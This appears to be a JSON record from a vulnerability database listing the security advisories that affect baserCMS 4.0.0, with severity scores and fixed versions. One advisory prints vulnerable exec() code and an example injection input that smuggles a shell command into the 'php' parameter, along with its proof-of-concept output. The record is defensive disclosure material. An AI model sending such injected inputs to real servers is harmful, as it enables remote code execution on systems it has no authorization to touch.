{"url":"http://public2.vulnerablecode.io/api/packages/54019?format=json","purl":"pkg:composer/baserproject/basercms@4.0.0","type":"composer","namespace":"baserproject","name":"basercms","version":"4.0.0","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"5.2.3","latest_non_vulnerable_version":"5.2.3","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/54253?format=json","vulnerability_id":"VCID-1q79-sxzp-zker","summary":"OS Command Injection\nbaserCMS allows a remote attacker with an administrative privilege to execute arbitrary OS commands via unspecified vectors.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-20682","reference_id":"","reference_type":"","scores":[{"value":"0.02357","scoring_system":"epss","scoring_elements":"0.8521","published_at":"2026-06-04T12:55:00Z"},{"value":"0.02357","scoring_system":"epss","scoring_elements":"0.85235","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-20682"},{"reference_url":"https://basercms.net/security/JVN64869876","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN64869876"},{"reference_url":"https://jvn.jp/en/jp/JVN64869876/index.html","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://jvn.jp/en/jp/JVN64869876/index.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20682","reference_id":"CVE-2021-20682","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20682"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/80118?format=json","purl":"pkg:composer/baserproject/basercms@4.4.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5"}],"aliases":["CVE-2021-20682","GHSA-g39q-f4rm-85x4"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1q79-sxzp-zker"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91611?format=json","vulnerability_id":"VCID-3new-f12y-8bf9","summary":"baserCMS has Unsafe File Upload Leading to Remote Code Execution (RCE)\n### Details\nThe application's restore function allows users to upload a `.zip` file, which is then automatically extracted. A PHP file inside the archive is included using `require_once` without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included.\n\nVector: Malicious ZIP upload + insecure `require_once`\n\n### PoC\n1. Restore backup\n ![image](https://github.com/user-attachments/assets/9e59768a-4a8e-472d-aaef-5d54546080f6)\n1. Load file shell (insecure `require_once`)\n ![image](https://github.com/user-attachments/assets/8f7919a2-c7f3-4ae1-af6c-1b0057e4ba22)\n ![image](https://github.com/user-attachments/assets/c10ef049-459d-429e-a608-8fb220c3387f)\n\n### Impact\nRemote Code Execution (RCE)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-32957","reference_id":"","reference_type":"","scores":[{"value":"0.00031","scoring_system":"epss","scoring_elements":"0.09459","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-32957"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-32957","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-32957"},{"reference_url":"https://github.com/advisories/GHSA-hv78-cwp4-8r7r","reference_id":"GHSA-hv78-cwp4-8r7r","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-hv78-cwp4-8r7r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2025-32957","GHSA-hv78-cwp4-8r7r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3new-f12y-8bf9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91137?format=json","vulnerability_id":"VCID-4zw8-truk-pugf","summary":"baserCMS has OS Command Injection Leading to Remote Code Execution (RCE)\n## Summary\n\nIn the core update functionality of baserCMS, some parameters sent from the admin panel are passed to the `exec()` function without proper validation or escaping. This issue allows **an authenticated CMS administrator to execute arbitrary OS commands on the server (Remote Code Execution, RCE)**.\n\nThis vulnerability is not a UI-level issue such as screen manipulation or lack of CSRF protection, but rather stems from **a design that directly executes input values received on the server side as OS commands**. Therefore, even if buttons are hidden in the UI, or even if CakePHP's CSRF/FormProtection (SecurityComponent) ensures that only legitimate POST requests are accepted, **an attack is possible as long as a request containing a valid token is processed within an administrator session**.\n\n---\n\n## Vulnerability Information\n\n| Item | Details |\n| ---- | ------- |\n| CWE | CWE-78: Improper Neutralization of Special Elements used in an OS Command |\n| Impact | Remote Code Execution (RCE) |\n| Severity | Critical |\n| Attack Requirements | Administrator privileges required |\n| Reproducibility | Reproducible (confirmed multiple times) |\n| Test Environment | baserCMS 5.2.2 (Docker / development environment) |\n\n---\n\n## Affected Areas\n\n- **Controller**\n - `PluginsController::get_core_update()`\n- **Service**\n - `PluginsService::getCoreUpdate()`\n- **Affected Endpoint**\n - `/baser/admin/baser-core/plugins/get_core_update`\n\n---\n\n## Technical Details\n\n### Vulnerable Code Flow\n\n```text\nPluginsController::get_core_update()\n ↓ Retrieves php parameter from POST data\nPluginsService::getCoreUpdate($targetVersion, $php, $force)\n ↓ Concatenates $php into command string without validation or escaping\nexec($command)\n```\n\n### Relevant Code (Excerpt)\n\n**PluginsController.php**\n\n```php\n$service->getCoreUpdate(\n $request->getData('targetVersion') ?? '',\n $request->getData('php') ?? 'php',\n $request->getData('force'),\n);\n```\n\n**PluginsService.php**\n\n```php\n$command = $php . ' ' . ROOT . DS . 'bin' . DS . 'cake.php composer ' .\n $targetVersion . ' --php ' . $php . ' --dir ' . TMP . 'update';\n\nexec($command, $out, $code);\n```\n\nThe `$php` parameter is user input, and **none** of the following countermeasures are in place:\n\n- Restriction via allowlist\n- Validation via regular expression\n- Escaping via `escapeshellarg()` or similar\n\n---\n\n## Attack Scenario\n\n1. The attacker logs in as a CMS administrator\n2. Sends a POST request to the core update functionality in the admin panel\n3. Specifies a string containing OS commands in the `php` parameter\n4. `exec()` is executed on the server side, running the arbitrary OS command\n\n### Example Attack Input (Conceptual)\n\n```text\nphp=php;id>/tmp/rce_test;#\n```\n\n---\n\n## Verification Results (PoC)\n\n### Execution Result\n\n```bash\n$ docker exec bc-php cat /tmp/rce_test\nuid=1000(www-data) gid=1000(www-data) groups=1000(www-data)\n```\n\nThe above confirms that OS commands can be executed with `www-data` privileges.\n\n### Additional Notes\n\n- Reproducible through the legitimate flow in the admin panel (browser)\n- Succeeds even with CSRF/FormProtection tokens included in a legitimate request\n- Failure cases (400/403) have also been investigated and differentiated\n- Confirmed reproducible via resending HTTP requests with tools such as curl (resending the same request containing valid tokens)\n\n---\n\n## Impact\n\nIf this vulnerability is exploited, the following becomes possible:\n\n- Retrieval of server information\n- Reading/writing arbitrary files\n- Retrieval of application configuration information (DB credentials, etc.)\n- OS-level operations beyond application permission boundaries\n\nAlthough administrator privileges are required, **this is a design issue where the impact extends from the application layer to the OS layer**, and the impact is considered significant.\n\n---\n\n## Recommended Fix\n\n### Primary Recommendation\n\n- Do not accept the PHP executable path from user input\n- Fix the PHP executable on the server side using the `PHP_BINARY` constant\n\n```php\n$php = escapeshellarg(PHP_BINARY);\n```\n\n### Supplementary Fix Recommendations\n\n- Apply `escapeshellarg()` escaping to other command-line arguments (version number, directory, etc.) as well\n- If possible, consider using execution methods that do not involve shell interpretation (array format, Process class, etc.)\n\n### Alternative (Not Recommended)\n\n- Allowlist validation for the PHP executable path\n- Combined use of regex validation and `escapeshellarg()`\n\nHowever, **from the perspective of reducing the attack surface, a design that eliminates user input entirely is recommended**.\n\n---\n\n## Additional Notes\n\n- This issue is independent of UI display controls (showing/hiding buttons)\n- As long as the endpoint exists, an attack is possible if a request containing valid tokens is processed\n- This is a problem stemming from the design-level handling of input, and cannot be prevented by CSRF or UI controls alone\n\n---\n\n## Conclusion\n\nDue to a design issue in baserCMS's core update functionality where user input is passed to `exec()` without validation, **Remote Code Execution (RCE) is achievable with administrator privileges**. This vulnerability can be fixed through input validation and design review, and prompt remediation is recommended.\n\nThis advisory was translated from Japanese to English using GitHub Copilot.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-21861","reference_id":"","reference_type":"","scores":[{"value":"0.00131","scoring_system":"epss","scoring_elements":"0.32198","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-21861"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-21861","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-21861"},{"reference_url":"https://github.com/advisories/GHSA-qxmc-6f24-g86g","reference_id":"GHSA-qxmc-6f24-g86g","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-qxmc-6f24-g86g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2026-21861","GHSA-qxmc-6f24-g86g"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4zw8-truk-pugf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/41774?format=json","vulnerability_id":"VCID-5ay3-1t5g-vycu","summary":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\nBaserCMS is an open source content management system with a focus on Japanese language support. Users with upload privilege may upload crafted zip files capable of path traversal on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-41279","reference_id":"","reference_type":"","scores":[{"value":"0.00438","scoring_system":"epss","scoring_elements":"0.6349","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00438","scoring_system":"epss","scoring_elements":"0.63447","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-41279"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41279","reference_id":"CVE-2021-41279","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41279"},{"reference_url":"https://github.com/advisories/GHSA-4x2f-54wr-4hjg","reference_id":"GHSA-4x2f-54wr-4hjg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4x2f-54wr-4hjg"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg","reference_id":"GHSA-4x2f-54wr-4hjg","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/59671?format=json","purl":"pkg:composer/baserproject/basercms@4.5.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4"}],"aliases":["CVE-2021-41279","GHSA-4x2f-54wr-4hjg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5ay3-1t5g-vycu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91016?format=json","vulnerability_id":"VCID-7x3n-4c2b-nfbx","summary":"baserCMS has OS command injection vulnerability in installer\nbaserCMS has an OS command injection vulnerability in the installer.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n\nIf baserCMS is placed on a server but not installed, malicious commands may be executed.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_54513170\n\n### Credits\n\nREN XINGDIAN","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30880","reference_id":"","reference_type":"","scores":[{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17526","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30880"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30880","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30880"},{"reference_url":"https://github.com/advisories/GHSA-6hpg-8rx3-cwgv","reference_id":"GHSA-6hpg-8rx3-cwgv","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-6hpg-8rx3-cwgv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2026-30880","GHSA-6hpg-8rx3-cwgv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7x3n-4c2b-nfbx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/41773?format=json","vulnerability_id":"VCID-891u-x525-ykbb","summary":"Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\nThere is a Potential Zip Slip Vulnerability and OS Command Injection Vulnerability on the management system of baserCMS. Users with permissions to upload files may upload crafted zip files which may execute arbitrary commands on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. If you are eligible, please update to the new version as soon as possible.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-41243","reference_id":"","reference_type":"","scores":[{"value":"0.02799","scoring_system":"epss","scoring_elements":"0.86405","published_at":"2026-06-05T12:55:00Z"},{"value":"0.02799","scoring_system":"epss","scoring_elements":"0.86382","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-41243"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41243","reference_id":"CVE-2021-41243","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41243"},{"reference_url":"https://github.com/advisories/GHSA-7rpc-9m88-cf9w","reference_id":"GHSA-7rpc-9m88-cf9w","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7rpc-9m88-cf9w"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w","reference_id":"GHSA-7rpc-9m88-cf9w","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/59671?format=json","purl":"pkg:composer/baserproject/basercms@4.5.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4"}],"aliases":["CVE-2021-41243","GHS